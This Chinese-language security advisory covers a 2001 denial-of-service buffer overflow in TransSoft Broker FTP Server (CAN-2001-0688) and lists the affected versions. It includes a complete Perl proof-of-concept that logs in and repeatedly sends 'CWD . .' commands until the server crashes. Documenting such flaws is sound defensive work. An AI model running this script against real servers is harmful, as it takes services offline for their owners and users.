安全研究
安全漏洞
TransSoft Broker CWD缓冲溢出漏洞
发布日期:2001-06-10
更新日期:2001-06-15
受影响系统:
描述:
TransSoft Broker FTP Server 5.9.5
TransSoft Broker FTP Server 5.7
TransSoft Broker FTP Server 5.1
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
TransSoft Broker FTP Server 5.0
TransSoft Broker FTP Server 4.7.5.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
TransSoft Broker FTP Server 4.0
TransSoft Broker FTP Server 3.0 Build 1
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
BUGTRAQ ID: 2851
CVE(CAN) ID: CAN-2001-0688
Broker是TransSoft公司的Windows平台下的Ftp服务器软件,发现它的多个版本存在拒
绝服务攻击漏洞。
登陆成功后,重复输入类似“CD . .”或“CWD . .”的命令会造成缓冲区溢出,然后
导致服务器宕机。
<*来源:courtesy ByteRage (byterage@yahoo.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
courtesy ByteRage (byterage@yahoo.com)提供了如下测试代码:
#!/usr/bin/perl
# Broker FTP Server 5.9.5.0 DoS proof of concept
#
# Syntax : perl brokerdos.pl <host> <port> <loginid> <loginpwd>
# Impact : eventually causes an access violation in the TSFTPSRV process
# the buffer overflow might be exploitable and be used to gain
access
# to the FTP Server hostcomputer.
#
# by [ByteRage] <byterage@yahoo.com>
# www.byterage.cjb.net (http://elf.box.sk/byterage/)
use IO::Socket;
$loginid = "anonymous";
$loginpwd = "anonymous";
if (!($host = $ARGV[0])) { $host = "127.0.0.1"; } print "Logging on @
$host:";
if (!($port = $ARGV[1])) { $port = "21"; } print "$port\n\n";
if (!($loginid = $ARGV[2])) { $loginid = "anonymous"; }
if (!($loginpwd = $ARGV[3])) { $loginpwd = "anonymous"; }
$SOCK = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
PeerPort=>$port) || die "Couldn't create socket !"; $SOCK->autoflush();
# get daemon banner
$reply = "";
sysread($SOCK, $reply, 2000);
print $reply;
# login
syswrite $SOCK, "USER $loginid\015\012";
sysread($SOCK, $reply, 2000);
print $reply;
syswrite $SOCK, "PASS $loginpwd\015\012";
sysread($SOCK, $reply, 2000);
print $reply;
sysread($SOCK, $reply, 2000);
print "$reply\nSending crash [";
if (substr($reply,0,1) == '2') {
# Login succesful, send CWD's
$i = 1; while ($i) {
$i = syswrite $SOCK, "CWD .
.\015\012";
print ".";
sleep(1);
}
print "]\nSocket write failed... possible cause : Host down :(\n";
}
close($SOCK);
exit();
建议:
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.transsoft.com/broker.htm
浏览次数:3893
严重程度:0(网友投票)
绿盟科技给您安全的保障